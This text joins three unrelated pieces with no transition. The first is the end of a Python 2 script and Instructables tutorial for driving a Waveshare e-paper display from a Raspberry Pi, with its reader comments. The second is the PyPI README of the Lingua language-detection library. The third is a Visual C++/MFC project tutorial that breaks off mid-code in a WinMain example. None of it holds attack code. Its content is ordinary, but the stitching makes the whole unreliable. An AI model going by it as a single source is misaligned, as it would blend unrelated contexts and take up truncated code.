                newtext = name[1][(oldy+1)*len(name[1])/divs:(y+1)*len(name[1])/divs]
                # print divs, oldy, y, newtext
            # draw time
            now = datetime.datetime.now()
            tstr = "%02d:%02d:%02d"%(now.hour,now.minute,now.second)
            # draw a shadow, time
            tpx = 36
            tpy = 96
            for i in range(tpy-4, tpy+32, 2):
                draw.line([0, i, 295, i], fill=255)
            draw.text((tpx-1, tpy  ), tstr, fill=0, font=myfont28)
            draw.text((tpx-1, tpy-1), tstr, fill=0, font=myfont28)
            draw.text((tpx  , tpy-1), tstr, fill=0, font=myfont28)
            draw.text((tpx+2, tpy  ), tstr, fill=0, font=myfont28)
            draw.text((tpx+2, tpy+2), tstr, fill=0, font=myfont28)
            draw.text((tpx  , tpy+2), tstr, fill=0, font=myfont28)
            draw.text((tpx  , tpy  ), tstr, fill=255, font=myfont28)
            del draw
            im = mainimg.transpose(Image.ROTATE_90)
            drawtime = time.time()
            print 't:draw:', (drawtime - loadtime)
            listim = list(im.getdata())
            # print im.format, im.size, im.mode, len(listim)
            listim2 = []
            for y in range(0, im.size[1]):
                for x in range(0, im.size[0]/8):
                    val = 0
                    for x8 in range(0, 8):
                        if listim[(im.size[1]-y-1)*im.size[0] + x*8 + (7-x8)] > 128:
                            # print x,y,x8,'ON'
                            val = val | 0x01 << x8
                        else:
                            # print x,y,x8,'OFF'
                            pass
                    # print val
                    listim2.append(val)
            for x in range(0,1000):
                listim2.append(0)
            # print len(listim2)
            convtime = time.time()
            print 't:conv:', (convtime - loadtime)
            ypos = 0
            xpos = 0
            # xStart, xEnd, yStart, yEnd, DisBuffer
            disp.EPD_Dis_Part(xpos, xpos+im.size[0]-1, ypos, ypos+im.size[1]-1, listim2)
            # disp.delay()
            uploadtime = time.time()
            print 't:upload:', (uploadtime - loadtime)
        except IOError as ex:
            print 'IOError', str(ex)
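The least obvious part of main.py is the inner loop that packs the 1-bit PIL image into the byte buffer the driver expects: 8 horizontal pixels per byte, with the rows flipped vertically. Here is the same index math run on a tiny hand-made 8x2 "image", so it can be followed without the hardware (the >128 threshold matches the loop in main.py):

```python
# Stand-in for list(im.getdata()): 8x2 pixels, values 0 (black) or 255 (white).
WIDTH, HEIGHT = 8, 2
pixels = [255] * 8 + [0, 255, 0, 255, 0, 255, 0, 255]  # row 0 white, row 1 striped

packed = []
for y in range(HEIGHT):
    for x in range(WIDTH // 8):
        val = 0
        for x8 in range(8):
            # same index math as main.py: bottom row comes first,
            # and bit 7 maps to the leftmost of the 8 pixels
            if pixels[(HEIGHT - y - 1) * WIDTH + x * 8 + (7 - x8)] > 128:
                val |= 0x01 << x8
        packed.append(val)

print(packed)  # [85, 255] -> 0x55 for the striped row, 0xFF for the white row
```

Once you see that one byte is one group of 8 pixels with the leftmost pixel in the top bit, the rest of the transfer is just shoveling bytes to EPD_Dis_Part.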
Credits
I used the free font "Amiga Forever" by Freaky Fonts.
Images shown on the disp are search results from duckduckgo "cat" search, no preferences for whatever comes up there.
23 Discussions
Question 5 months ago
Hi, I seem to have a problem after loading the screen content. There is a grey border appearing slowly and staying there. It also disrupts the screen content, as seen in the picture. Do you think it is fixable somehow? It happened after running the Waveshare code maybe three times on a new display and persists after adding some of my own code. I hope it's not permanent damage like you mentioned in the video. Thank you very much!
1 year ago on Introduction
Ok, I got this working with an RPi Zero W without many modifications, only the PIL import line that was already mentioned. Thank you very much. A thing to note is that my screen has a bit of ghosting around the contrasting elements after some updates. Two flashes, one white one black, clear the problem, so it is not persistent.
One issue that could have been solved is that it works with Python 2.7 and not 3.x, while some of the new helper libraries I'd love to use in my sensor project are 3.x exclusive.
-------------
Added a wiring diagram for my project, as the table on the main page is hard to read. Waveshare screen comes with the colorful leads. Valid until they change colors :) (uses other ground connector for better packing)
Reply 1 year ago
Hi MaciejE2, don't suppose you still have the code for your project? I'd love to take a look at it. Attempting a similar project myself, but with temp and pressure for a weather station.
Cheers
Question 1 year ago
Hi, I followed the instructions (step by step), but I get this error (screenshot also included):
EPD_Init
Reset is complete
disp size : 128x296
------------init and Clear full screen------------
1.init full screen
2.clear full screen
Traceback (most recent call last):
File "/home/pi/Schreibtisch/neu0/RaspberryPi/python1/main.py", line 95, in <module>
myfont10 = ImageFont.truetype("amiga_forever/amiga4ever.ttf", 8)
Any idea what the problem could be?
Answer 1 year ago
Looks like the font is not found. It is searched under "amiga_forever" from your current path. Make sure you have that, or make it an absolute path, or copy the ttf file to /usr/share/fonts and remove the path in the code.
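A minimal sketch of the absolute-path option (the folder layout is the one from the tutorial):

```python
import os

# Turn the relative font path into an absolute one, so the script finds
# the font no matter which directory it is started from.
font_rel = os.path.join("amiga_forever", "amiga4ever.ttf")
font_abs = os.path.abspath(font_rel)
print(font_abs)
```

ImageFont.truetype(font_abs, 8) should then work regardless of the working directory.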
Cheers M.
Reply 1 year ago
Thanks this was very helpful :)
But now I have another problem: this time I get a number of x entries for every search, but it takes ages every time to continue with the next "search word", and nothing is displayed on the ePaper display.

A screenshot is added (by the way, I waited half an hour till I got to this point and it is still working, with new "search results"/x entries popping up).
Reply 1 year ago
Any Idea ? The program got stuck in this continuos loop and the display seems not to be activated :( What could've gone wrong ?
Reply 1 year ago
Hard to say, try to comment in some of the print command at the end of main.py and find out where all the time goes.
Reply 1 year ago
I commented in the 'print drawtime, convtime and uploadtime' but I got the error "uploadtime not defined" so I added the line "uploadtime = time.time()" then this error disappeared but the program still got stuck emitting search results eternally (with the draw-,conv-,uploadtimes being printed now). The display still shows no Image.
Question 1 year ago on Introduction
I received a pdf file that may be of some help to you, but it's over my head (sadly that doesn't take much anymore). If you would like a copy please tell me how to get it to you.
Question 2 years ago on Introduction
In the EPD_driver.py file, where did you get the values for LUTDefault_full and LUTDefault_part? I'm trying to modify your code to drive the 7.5" Waveshare display, but I'm not seeing anything equivalent to that data in the original Waveshare code. I see that same data in a few different Github repos, but no explanation as to where it comes from. Thanks.
Answer 1 year ago
I am currently having the same issue.
Did you find any solution yet?
Reply 1 year ago
I don't believe I ever found an explanation for those two values, however I did get my display running by building off the code supplied by Waveshare. You can dig through my project on Github to see how I made it work:
Question 2 years ago on Introduction
Hey there, nice tutorial! I got myself a 2,7" waveshare HAT and wonder at which location you got the original EPD_Driver.py? My display seems to be not supported... that's not what I expected when buying a HAT for my Raspberry Pi3
Answer 2 years ago
Hi, The waveshare wiki has a page for each display there is a link to a demo zip file on this page.
Cheers, M.
Question 2 years ago
I'm having a python issue with the waveshare and this example.
I followed the instructions using the latest raspbian stretch, and installed python-pil
Traceback (most recent call last):
File "main.py", line 3, in <module>
import Image, ImageDraw, ImageFont # PIL - PythonImageLibrary
ImportError: No module named Image
Also tried to install pil and then pillow with pip, but no luck.
Anyone have the same issue?
Answer 2 years ago
In case anyone else wonders the same.
Seems like the problem with at least the waveshare example was that
"import Image" needed to be "from PIL import Image"
same for "ImageFont" and "ImageDraw" which also needed the "from PIL" part.
Question 2 years ago on Introduction
do you have full command list what i need to install etc. I have clean raspberry pi zero w with rasbian lite. i try earlier and error is no module named EPD_driver
Answer 2 years ago
Look for the attached zip file, this contains my code, main.py and the modified EPD_driver.py (original was from Waveshare download) Eventually your python does not look for lib files in the current directory -> ask your fav search engine.
2 years ago
Hi, it's difficult to "fix" the software without the hardware for testing it, It took me a some iterations to get mine running.
However, the docu of the 2.13 HAT says something about a "virtual width" of 128 instead of 122, meaning the display memory is 128 pixel width to keep the lines byte aligned.
Maybe a width setting of 128 does the trick.
Cheers. | https://www.instructables.com/id/Waveshare-EPaper-and-a-RaspberryPi/ | CC-MAIN-2020-29 | refinedweb | 2,235 | 66.74 |
An accurate natural language detection library, suitable for long and short text alike
Project description
1. What does this library.
2. Why does this library exist?
Language detection is often done as part of large machine learning frameworks or natural language processing applications. In cases where you don't need the full-fledged functionality of those systems or don't want to learn the ropes of those, a small flexible library comes in handy.
Python is widely used in natural language processing, so there are a couple of comprehensive open source libraries for this task, such as Google's CLD 2 and CLD 3, langid and langdetect. Unfortunately, except for the last one they have two major drawbacks:
- Detection only works with quite lengthy text fragments. For very short text snippets such as Twitter messages, they do not provide adequate results.
- The more languages take part in the decision process, the less accurate are the detection results.
Lingua aims at eliminating these problems. She nearly does not need any configuration and yields pretty accurate results on both long and short text, even on single words and phrases. She draws on both rule-based and statistical methods but does not use any dictionaries of words. She does not need a connection to any external API or service either. Once the library has been downloaded, it can be used completely offline.
3. Which languages are supported?
Compared to other language detection libraries, Lingua's focus is on quality over quantity, that is, getting detection right for a small set of languages first before adding new ones. Currently, the following 75 languages are supported:
- A
- Afrikaans
- Albanian
- Arabic
- Armenian
- Azerbaijani
- B
- Basque
- Belarusian
- Bengali
- Norwegian Bokmal
- Bosnian
- Bulgarian
- C
- Catalan
- Chinese
- Croatian
- Czech
- D
- Danish
- Dutch
- E
- Esperanto
- Estonian
- F
- Finnish
- G
- Ganda
- Georgian
- German
- Greek
- Gujarati
- H
- Hebrew
- Hindi
- Hungarian
- I
- Icelandic
- Indonesian
- Irish
- Italian
- J
- Japanese
- K
- Kazakh
- Korean
- L
- Latin
- Latvian
- Lithuanian
- M
- Macedonian
- Malay
- Maori
- Marathi
- Mongolian
- N
- Norwegian Nynorsk
- P
- Persian
- Polish
- Portuguese
- Punjabi
- R
- Romanian
- Russian
- S
- Serbian
- Shona
- Slovak
- Slovene
- Somali
- Sotho
- Spanish
- Swahili
- Swedish
- T
- Tagalog
- Tamil
- Telugu
- Thai
- Tsonga
- Tswana
- Turkish
- U
- Ukrainian
- Urdu
- V
- Vietnamese
- W
- Welsh
- X
- Xhosa
- Y
- Yoruba
- Z
- Zulu
4. How good is it?
Lingua is able to report accuracy statistics for some bundled test data available for each supported language. The test data for each language is split into three parts:
- a list of single words with a minimum length of 5 characters
- a list of word pairs with a minimum length of 10 characters
- a list of complete grammatical sentences of various lengths
Both the language models and the test data have been created from separate documents of the Wortschatz corpora offered by Leipzig University, Germany. Data crawled from various news websites have been used for training, each corpus comprising one million sentences. For testing, corpora made of arbitrarily chosen websites have been used, each comprising ten thousand sentences. From each test corpus, a random unsorted subset of 1000 single words, 1000 word pairs and 1000 sentences has been extracted, respectively.
Given the generated test data, I have compared the detection results of Lingua, langdetect, langid, CLD 2 and CLD 3 running over the data of Lingua's supported 75 languages. Languages that are not supported by the other detectors are simply ignored for them during the detection process.
The box plots below illustrate the distributions of the accuracy values for each classifier. The boxes themselves represent the areas which the middle 50 % of data lie within. Within the colored boxes, the horizontal lines mark the median of the distributions. All these plots demonstrate that Lingua clearly outperforms its contenders. Bar plots for each language can be found in the file ACCURACY_PLOTS.md. Detailed statistics including mean, median and standard deviation values for each language and classifier are available in the file ACCURACY_TABLE.md.
4.1 Single word detection
4.2 Word pair detection
4.3 Sentence detection
4.4 Average detection
5. Why is it better than other libraries?
Every language detector uses a probabilistic n-gram model trained on the character distribution in some training corpus. Most libraries only use n-grams of size 3 (trigrams) which is satisfactory for detecting the language of longer text fragments consisting of multiple sentences. For short phrases or single words, however, trigrams are not enough. The shorter the input text is, the less n-grams are available. The probabilities estimated from such few n-grams are not reliable. This is why Lingua makes use of n-grams of sizes 1 up to 5 which results in much more accurate prediction of the correct language.
A second important difference is that Lingua does not only use such a statistical model, but also a rule-based engine. This engine first determines the alphabet of the input text and searches for characters which are unique in one or more languages. If exactly one language can be reliably chosen this way, the statistical model is not necessary anymore. In any case, the rule-based engine filters out languages that do not satisfy the conditions of the input text. Only then, in a second step, the probabilistic n-gram model is taken into consideration. This makes sense because loading less language models means less memory consumption and better runtime performance.
In general, it is always a good idea to restrict the set of languages to be considered in the classification process using the respective api methods. If you know beforehand that certain languages are never to occur in an input text, do not let those take part in the classifcation process. The filtering mechanism of the rule-based engine is quite good, however, filtering based on your own knowledge of the input text is always preferable.
6. Test report generation
If you want to reproduce the accuracy results above, you can generate the test reports yourself for all classifiers and languages by executing:
poetry install --extras "langdetect langid gcld3 pycld2" poetry run python3 scripts/accuracy_reporter.py
For each detector and language, a test report file is then written into
/accuracy-reports.
As an example, here is the current output of the Lingua German report:
##### German ##### >>> Accuracy on average: 89.27% >> Detection of 1000 single words (average length: 9 chars) Accuracy: 74.20% Erroneously classified as Dutch: 2.30%, Danish: 2.20%, English: 2.20%, Latin: 1.80%, Bokmal: 1.60%, Italian: 1.30%, Basque: 1.20%, Esperanto: 1.20%, French: 1.20%, Swedish: 0.90%, Afrikaans: 0.70%, Finnish: 0.60%, Nynorsk: 0.60%, Portuguese: 0.60%, Yoruba: 0.60%, Sotho: 0.50%, Tsonga: 0.50%, Welsh: 0.50%, Estonian: 0.40%, Irish: 0.40%, Polish: 0.40%, Spanish: 0.40%, Tswana: 0.40%, Albanian: 0.30%, Icelandic: 0.30%, Tagalog: 0.30%, Bosnian: 0.20%, Catalan: 0.20%, Croatian: 0.20%, Indonesian: 0.20%, Lithuanian: 0.20%, Romanian: 0.20%, Swahili: 0.20%, Zulu: 0.20%, Latvian: 0.10%, Malay: 0.10%, Maori: 0.10%, Slovak: 0.10%, Slovene: 0.10%, Somali: 0.10%, Turkish: 0.10%, Xhosa: 0.10% >> Detection of 1000 word pairs (average length: 18 chars) Accuracy: 93.90% Erroneously classified as Dutch: 0.90%, Latin: 0.90%, English: 0.70%, Swedish: 0.60%, Danish: 0.50%, French: 0.40%, Bokmal: 0.30%, Irish: 0.20%, Tagalog: 0.20%, Tsonga: 0.20%, Afrikaans: 0.10%, Esperanto: 0.10%, Estonian: 0.10%, Finnish: 0.10%, Italian: 0.10%, Maori: 0.10%, Nynorsk: 0.10%, Somali: 0.10%, Swahili: 0.10%, Turkish: 0.10%, Welsh: 0.10%, Zulu: 0.10% >> Detection of 1000 sentences (average length: 111 chars) Accuracy: 99.70% Erroneously classified as Dutch: 0.20%, Latin: 0.10%
7. How to add it to your project?
Lingua is available in the Python Package Index and can be installed with:
pip install lingua-language-detector
8. How to build?
Lingua requires Python >= 3.7 and uses Poetry for packaging and dependency management. You need to install it first if you have not done so yet. Afterwards, clone the repository and install the project dependencies:
git clone cd lingua-py poetry install
The library makes uses of type annotations which allow for static type checking with Mypy. Run the following command for checking the types:
poetry run mypy
The source code is accompanied by an extensive unit test suite. To run the tests, simply say:
poetry run pytest
9. How to use?
9.1 Basic usage
>>> from lingua import Language, LanguageDetectorBuilder >>> languages = [Language.ENGLISH, Language.FRENCH, Language.GERMAN, Language.SPANISH] >>> detector = LanguageDetectorBuilder.from_languages(*languages).build() >>> detector.detect_language_of("languages are awesome") Language.ENGLISH
9.2 Minimum relative distance
By default, Lingua returns the most likely language for a given input text. However, there are certain words that are spelled the same in more than one language. The word prologue, for instance, is both a valid English and French word. Lingua would output either English or French which might be wrong in the given context. For cases like that, it is possible to specify a minimum relative distance that the logarithmized and summed up probabilities for each possible language have to satisfy. It can be stated in the following way:
>>> from lingua import Language, LanguageDetectorBuilder >>> languages = [Language.ENGLISH, Language.FRENCH, Language.GERMAN, Language.SPANISH] >>> detector = LanguageDetectorBuilder.from_languages(*languages)\ .with_minimum_relative_distance(0.25)\ .build() >>> print(detector.detect_language_of("languages are awesome")) None
Be aware that the distance between the language probabilities is dependent on
the length of the input text. The longer the input text, the larger the
distance between the languages. So if you want to classify very short text
phrases, do not set the minimum relative distance too high. Otherwise,
None
will be returned most of the time as in the example above. This is the return
value for cases where language detection is not reliably possible.
9.3 Confidence values
Knowing about the most likely language is nice but how reliable is the computed likelihood? And how less likely are the other examined languages in comparison to the most likely one? These questions can be answered as well:
>>> from lingua import Language, LanguageDetectorBuilder >>> languages = [Language.ENGLISH, Language.FRENCH, Language.GERMAN, Language.SPANISH] >>> detector = LanguageDetectorBuilder.from_languages(*languages).build() >>> confidence_values = detector.compute_language_confidence_values("languages are awesome") >>> for language, value in confidence_values: ... print(f"{language.name}: {value:.2f}") ENGLISH: 1.00 FRENCH: 0.79 GERMAN: 0.75 SPANISH: 0.70
In the example above, a list of all possible languages is returned, sorted by their confidence value in descending order. The values that the detector computes are part of a relative confidence metric, not of an absolute one. Each value is a number between 0.0 and 1.0. The most likely language is always returned with value 1.0. All other languages get values assigned which are lower than 1.0, denoting how less likely those languages are in comparison to the most likely language.
The list returned by this method does not necessarily contain all languages which this LanguageDetector instance was built from. If the rule-based engine decides that a specific language is truly impossible, then it will not be part of the returned list. Likewise, if no ngram probabilities can be found within the detector's languages for the given input text, the returned list will be empty. The confidence value for each language not being part of the returned list is assumed to be 0.0.
9.4 Eager loading versus lazy loading
By default, Lingua uses lazy-loading to load only those language models on demand which are considered relevant by the rule-based filter engine. For web services, for instance, it is rather beneficial to preload all language models into memory to avoid unexpected latency while waiting for the service response. If you want to enable the eager-loading mode, you can do it like this:
LanguageDetectorBuilder.from_all_languages().with_preloaded_language_models().build()
Multiple instances of
LanguageDetector share the same language models in
memory which are accessed asynchronously by the instances.
9.5 Methods to build the LanguageDetector
There might be classification tasks where you know beforehand that your language data is definitely not written in Latin, for instance. The detection accuracy can become better in such cases if you exclude certain languages from the decision process or just explicitly include relevant languages:
from lingua import LanguageDetectorBuilder, Language, IsoCode639_1, IsoCode639_3 # Including all languages available in the library # consumes approximately 3GB of memory and might # lead to slow runtime performance. LanguageDetectorBuilder.from_all_languages() # Include only languages that are not yet extinct (= currently excludes Latin). LanguageDetectorBuilder.from_all_spoken_languages() # Include only languages written with Cyrillic script. LanguageDetectorBuilder.from_all_languages_with_cyrillic_script() # Exclude only the Spanish language from the decision algorithm. LanguageDetectorBuilder.from_all_languages_without(Language.SPANISH) # Only decide between English and German. LanguageDetectorBuilder.from_languages(Language.ENGLISH, Language.GERMAN) # Select languages by ISO 639-1 code. LanguageDetectorBuilder.from_iso_codes_639_1(IsoCode639_1.EN, IsoCode639_1.DE) # Select languages by ISO 639-3 code. LanguageDetectorBuilder.from_iso_codes_639_3(IsoCode639_3.ENG, IsoCode639_3.DEU)
10. What's next for version 1.1.0?
Take a look at the planned issues.
11. Contributions
Any contributions to Lingua are very much appreciated. Please read the instructions
in
CONTRIBUTING.md
for how to add new languages to the library.
Project details
Release history Release notifications | RSS feed
Download files
Download the file for your platform. If you're not sure which to choose, learn more about installing packages. | https://pypi.org/project/lingua-language-detector/ | CC-MAIN-2022-27 | refinedweb | 2,212 | 52.05 |
Shader that gets data from an object: Refresh
- fwilleke80 last edited by
Hello,
I'm writing a channel shader. It has a LINK box where the user links an object from the scene. The object is also a plugin of mine. The shader gets some data from the object and renders it. It already works fine with editor and PV renders.
But here is a question:
When I change attributes of the object, I want the shader to update automatically. Currently, the editor/viewport representation of the shader only changes when I force it to update by eg. changing a shader attribute. Is there a standard way to either notify all instances of my shader if my plugin object changes; or can a shader somehow observe the linked object to detect changes?
Thanks in advance!
Cheers from Berlin,
Frank
Hi,
have tried the "standard hacky way " of evaluating the dirty state of the object node in question in
NodeData::Messageof your shader node?
I also am always completely at a loss again every time I encounter such scenario and what message to choose / piggy back on, because of the rather lacklustre documentation of the message system of Cinema. You would have to look at the message feed and choose an appropriate message id or just blanked in the evaluation if no message id alone seems sufficient. This solution is obviously not perfect, as it still might result in noticeable delays until the change of data is reflected in the viewport.
Cinema probably also needs at some point a modern event subscription / delegate logic system, because it is one of the most common problems here on the forum. The overhead of such system is not so bad on modern machines anymore that it would justify completely ignoring such feature.
Cheers,
zipit
I have had to do this a few times in the past. What I do is store a BaseLink to all the Shaders that are used on my Object. I register and deregister them in the SetDParameter methods of the Shader itself. IE the shader registerers itself with the objects it is added to. And when the shader is destroyed it unregisters itself from the object it is applied to. Then when the object needs the shader to update it goes through its list of shaders that are registered to it and sets its dirty flag. SetDirty(DIRTYFLAGS::ALL); This should work fine for you since you are also storing a link to the object in your shader itself, which is also required so it knows what to register and deregister itself to.
Hi @fwilleke80 unfortually I just come to confirm there is no real way or at least nothing that comes with Cinema 4D.
Your best bet is to implement as Kent suggested a kind of observable pattern.
Cheers,
Maxime.
- fwilleke80 last edited by fwilleke80
Thank you very much, I'll try that!
Cheers,
Frank
P.S.: There might be follow-up questions to this, but I'll mark this as SOLVED for now.
- fwilleke80 last edited by fwilleke80
It works like a charm!
Thank you again!
I was surprised at how little code was required.
Sharing is caring. In case anyone needs it, here's the code:
#include "ge_prepass.h" #include "c4d_general.h" #include "c4d_baselinkarray.h" #include "c4d_basedocument.h" /// /// \brief Registers observers and sends messages to them. /// class Observable { public: /// /// \brief Subscribes a new observer. /// /// \param[in] observer Pointer to an AtomGoal /// \param[in] doc The document that owns the AtomGoal /// /// \return A maxon error object if anything went wrong, otherwise maxon::OK /// maxon::Result<void> Subscribe(C4DAtomGoal *observer, BaseDocument *doc); /// /// \brief Unsubscribes an observer /// /// \param[in] observer Pointer to an AtomGoal that has previously been subscribed /// \param[in] doc The document that owns the AtomGoal /// void Unsubscribe(C4DAtomGoal *observer, BaseDocument *doc); /// /// \brief Sends a messages to all subscribed observers /// /// \param[in] type Message type /// \param[in] doc The document that owns the subscribed observers /// \param[in] data Optional message data /// void Message(Int32 type, BaseDocument *doc, void *data = nullptr) const; private: BaseLinkArray _observers; }; maxon::Result<void> Observable::Subscribe(C4DAtomGoal *observer, BaseDocument *doc) { if (!observer) return maxon::NullptrError(MAXON_SOURCE_LOCATION, "Observer must not be nullptr!"_s); // Check if this observer is already registered const Int32 observerIndex = _observers.Find(observer, doc); if (observerIndex != NOTOK) return maxon::OK; // Register new observer if (!_observers.Append(observer)) { return maxon::OutOfMemoryError(MAXON_SOURCE_LOCATION, "Failed to add observer to the list!"_s); } return maxon::OK; } void Observable::Unsubscribe(C4DAtomGoal *observer, BaseDocument *doc) { if (observer && doc) { const Int32 observerIndex = _observers.Find(observer, doc); if (observerIndex != NOTOK) { _observers.Remove(observerIndex); } } } void Observable::Message(Int32 type, BaseDocument *doc, void *data) const { for (Int32 i = 0; i < _observers.GetCount(); ++i) { C4DAtomGoal *atom = _observers.GetIndex(i, doc); 
if (atom) { atom->Message(type, data); } } } | https://plugincafe.maxon.net/topic/12823/shader-that-gets-data-from-an-object-refresh | CC-MAIN-2020-40 | refinedweb | 792 | 56.25 |
Odoo Help
Odoo is the world's easiest all-in-one management software. It includes hundreds of business apps:
CRM | e-Commerce | Accounting | Inventory | PoS | Project management | MRP | etc.
Where should I save a model wich inherits from another for adding fields?
Hi there,
My doubt is the following:
I want to add fields to the resource.resource model, so , as I learnt, I have to inherit from resource with the parameters set as below:
_name = 'resource.resource'
_inherit = 'resource.resource'
Then add the fields I want in the _columns parameter.
Until here everything is ok, but then I have some issues I don't know how to solve:
Where should I write the new class? Inside resource.py? or should I write a new .py (for example: resource2.py)
If I should write a new .py, where should I save it? Inside the resource folder? or in a custom folder? and besides, do I need some imports?
Any other recommendations are welcomed.
Thanks in advance
Code:
class resource_resource(osv.Model): _name = 'resource.resource' _inherit = 'resource.resource' _columns = { 'name' : fields.function(_get_full_name, type='text', 'Full Name'), 'x_name' : fields.text('Name'), 'x_sname' : fields.text('Surname'), } def _get_full_name(self,cr,uid,ids,field,arg,context=None): aResource = self.browse(cr,uid,ids) return (aResource.x_name + ' ' + aResource.x_sname)
Openerp version: 7
Hi, You can write in the same py file by creating different class. But its always good to write in new py file which is separated from the base module. Because when performing upgrade there is a chance that your code get deleted.
Thanks for the answer, I would like to create a new .py, Would it be ok if I locate it in a Resource-Custom folder created by myself? Shouldn't I make some imports?
You can create a custom module and add the extra fields in the py file of inherited class. Write the _view.xml file only for the field you have newly created and give the ref as <field name="inherit_id" ref="object.yourview" />
About This Community
Odoo Training Center
Access to our E-learning platform and experience all Odoo Apps through learning videos, exercises and Quizz.Test it now
Can u paste your code ?
Hi, I will edit my post with the code though my question is not about the code itself but more related to where should I put it. | https://www.odoo.com/forum/help-1/question/where-should-i-save-a-model-wich-inherits-from-another-for-adding-fields-49753 | CC-MAIN-2017-43 | refinedweb | 395 | 69.99 |
New Faster RubyMine 4.0 EAP is Ready for Download
Hello
15 Responses to New Faster RubyMine 4.0 EAP is Ready for Download
Sergei says:November 14, 2011
Is Ruby plugin updated as well?
Dennis Ushakov says:November 14, 2011
Sergei, we’ll publish updated plugin version in next couple of days, most probably tomorrow.
Xavier Noria says:November 14, 2011
Cool! How do you go to a class by full class name? I don’t see it in the Navigation menu, and Go to Class appears not to understand a namespace.
Dennis Ushakov says:November 14, 2011
Xavier, Go to Class should understand full class name, it may need more letters of actual class you are looking for due to filtering mechanism limitations (for example, AR::B is not enough, but AR::Bas is good)
Pawel Barcik says:November 14, 2011 ?? 🙂
KODer says:November 15, 2011
Very nice release!
Thanks for front-end improve.
Csaba says:November 15, 2011
Where did the alt+shift+n shortcut go? Supposed to be goto model/helper/view/test, now it does nothing. (mac osx) Disappeared from the menu as well.
Tatiana Vasilyeva says:November 16, 2011
Csaba, now it could be found in the menu Navigate->Related files (Ctrl+Alt+Home). We’re planning to get back Alt+Shift+N for that.
Csaba says:November 18, 2011
Thanks Tatiana!
Daniele Mazzini says:November 23, 2011
I use that binding all the time, couldn’t you set an easier key combination? Or – can I configure that myself? Thanks!
Tatiana Vasilyeva says:November 23, 2011
Daniele, you can configure it yourself in Settings | Keymap. Just find the action Main menu->Navigate->Related File and add your own shortcut or change an existing one.
Bill says:November 22, 2011
Praise allah! This is exactly the update I’ve been waiting for…you’ve already got a great product, except for the fact it was difficult to bear the slowness on our enormous project. Thanks for listening.
Gerhard says:November 23, 2011
Artem Chernikov says:November 25, 2011
Maybe only in my case, but TAB button make wrong indentation (double sized).
Tatiana Vasilyeva says:November 25, 2011
Artem,
Could you please create an issue at the RubyMine issue tracker and specify for what files it occurs. | https://blog.jetbrains.com/ruby/2011/11/new-faster-rubymine-4-0-eap-is-ready-for-download/ | CC-MAIN-2021-25 | refinedweb | 381 | 74.49 |
Introduction to MFC Applications
Visual C++ Projects and Files
Creating a New Project
Microsoft Visual C++ allows you to create various types
of projects ranging from console applications to complex libraries, from
Win32 applications to communications modules or multimedia assignments.
Various options are available to create a project:
- On the main menu, click File -> New -> Project...
- Press Ctrl+Shift+N
Any of these actions would display the New Project
dialog box from where you can select the type of project you want.
Practical Learning: Creating a Microsoft Visual C++ Project
Creating a File
Although the most popular files used in Microsoft
Visual C++ are header and source files, this IDE allows you to create
various other types of files that are not natively C++ types.
To create a file, if a project is currently opened:
- On the main menu, click File -> New -> File...
- Press Ctrl+N
Adding Existing Files to a Project
If a file has already been created and exists in a separate
folder, drive, directory, or project, you can import it and add it
to your application. Because Microsoft Visual Studio allows you a
great level of flexibility in the types of files you can add, it is
your responsibility to check that any file you add to a project is valid.
If you copy a file from somewhere and paste it in the
folder that contains your project, the file is still not considered as
part of the project. You must explicitly add it. Before adding an existing
file to your project:
- On the main menu, click Project -> Add Existing Item...
- In the Solution Explorer, right-click the name of the project, position the mouse on Add, and click Existing Item...
Any of these actions would open the Add Existing Item
dialog box. This requires you to locate the item and select it. Once the
item is ready, to add it to the project, click the Open button. If you
want to open it first, click the arrow of the Open button and specify how
you want to open the file.
Adding Classes
To add a class to your project, you have various
options. You can separately create a header file then create a source
file. You can also import an existing header file and a source file from
any valid path. Microsoft Visual C++ makes it easy to create a C++ class.
When doing this, a header and a source file are prepared. A (default)
constructor and a destructor are added. You can delete or completely
change the supplied constructor and/or the destructor. Also, Microsoft
Visual C++ includes the name of the header file in the source file so you
do not have to remember to do this yourself. Most classes in Microsoft Visual C++
have their names starting with the letter C. Although this is only a
suggestion, and any valid class name would work fine, to keep some
harmony, in our lessons, we will follow this convention.
To create a new class and add it to your project:
- On the main menu, click Project -> Add Class...
- In the Class View or Solution Explorer, right-click the name of the project, position the mouse on Add, and click Class...
Any of these actions would open the New Class dialog
box. From there, you can specify the type of class you want to create and
click Open. You will then be asked to provide a name for the class.
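As an illustration, a newly added class named CSimple (a hypothetical name;
any valid name works) would produce a header/source pair along these lines.
For this sketch both parts are shown in one listing, and the wizard's
automatic #include of the header is shown as a comment:

```cpp
// CSimple.h - the class declaration prepared by the wizard
class CSimple
{
public:
    CSimple();   // the supplied (default) constructor
    ~CSimple();  // the supplied destructor
};

// CSimple.cpp - the class implementation
// #include "CSimple.h"   <- added automatically by the wizard

CSimple::CSimple()
{
}

CSimple::~CSimple()
{
}
```

You can delete or completely change the supplied constructor and destructor,
as mentioned above.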
Opening Files
To open a file:
- On the main menu, click File -> Open -> File...
- Press Ctrl+O
If you had previously created or opened a file,
Microsoft Visual C++ keeps a list of the most recently used (MRU) files
under the File menu. To control the maximum number of files that can be
listed, on the mein menu, click Tools -> Options. In the left list of the
Options dialog box, click Environment and click General:
After specifying the desired value, click OK.
Opening Existing Projects
A project is made of various files and subject to the
environment in which it was created. A project itself is a file but it is
used to "connect"Â all the other files that compose its particular
application.
There is a limit on the types of projects you can open
in Microsoft Visual Studio. This is not an anomaly. Every
computer-programming project is created using a particular environment and
each environment configures and arranges its project as its judges it
necessary. Any attempt to open an unrecognizable project would produce an
error.
Microsoft Visual Studio is configured to easily open
various types of projects. To open a project:
- On the main menu, click File -> Open -> Project...
- Press Ctrl+Shift+O
Introduction to the Microsoft Foundation Class Library
Introduction to Win32
Win32 is a library made of data types, variables,
constants, functions, and classes (mostly structures) that can be used to
create applications for the Microsoft Windows family of operating systems.
A typical application is made of at least two objects: a control and a
host object on which the control is positioned.
To create a Win32 application using Microsoft Visual
C++:
Any of these actions would display the New Project
dialog box. From there, select Win32 Project item.
Just like a C++ program always has a main()
function, a Win32 program uses a central function called WinMain.
The syntax of that function is:
INT WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance,
LPSTR lpCmdLine, int nCmdShow );
To support international characters, Microsoft Windows
provides another version of this function named _tWinMain.
This version uses the same syntax (same arguments) as the first.
Unlike the C++'s main() function, the arguments
of the WinMain() function are not optional. Your program will need
them to communicate with the operating system. Here is an example of
starting a program with the WinMain() function:
#include <windows.h>
INT WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance,
